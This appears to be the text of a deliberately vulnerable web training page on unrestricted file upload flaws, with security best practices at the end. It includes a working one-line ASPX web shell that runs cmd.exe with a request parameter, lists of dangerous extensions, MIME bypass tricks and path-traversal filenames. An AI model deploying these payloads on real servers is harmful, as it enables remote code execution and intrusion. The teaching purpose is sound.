Upload File

File Upload Demo - Unrestricted File Upload

Unrestricted File Upload vulnerabilities occur when an application allows users to upload files without proper validation, potentially leading to remote code execution, defacement, or other attacks.

How File Upload Attacks Work:

Attacker uploads malicious files (PHP, ASP, JSP, executable files)
Server stores file without validation
Attacker accesses uploaded file via direct URL
Malicious code executes on server
        

Try These Attack Scenarios:

1. Web Shell Upload (if PHP/ASP supported):

Create a file named: shell.aspx
Content:
<%@ Page Language="C#" %>
<% Response.Write(System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]).StandardOutput.ReadToEnd()); %>
        

2. Malicious File Extensions:

Try uploading files with these extensions:
- .php, .php3, .php4, .php5, .phtml
- .asp, .aspx, .jsp
- .exe, .bat, .cmd
- .htaccess (to override server configuration)
- Double extensions: file.jpg.php
        

3. MIME Type Bypass:

Create malicious content but with safe extensions:
- malicious.txt (contains PHP code)
- script.jpg (contains executable code)
- Use tools like Burp Suite to modify Content-Type header
        

4. Path Traversal in Upload:

Try filenames with path traversal:
- ../../../malicious.php
- ..\\..\\..\\malicious.aspx
- ....//....//malicious.jsp
        

Current Vulnerabilities in This Demo:

No file type validation
No file size limits
No filename sanitization
Files stored in web-accessible directory
No content scanning
Original filename preserved
        

File Upload Security Best Practices:

File Type Validation: Whitelist allowed file extensions and MIME types
File Size Limits: Implement maximum file size restrictions
Filename Sanitization: Remove/replace dangerous characters
Content Validation: Scan file contents, not just extensions
Storage Location: Store files outside web root or use separate domain
Virus Scanning: Implement antivirus scanning for uploads
Execute Permissions: Remove execute permissions from upload directory

Test Steps:

Try uploading different file types (.txt, .php, .exe, etc.)
Upload files with dangerous filenames
Check if uploaded files are accessible directly
Try uploading files with malicious content
Test file size limits (try very large files)
        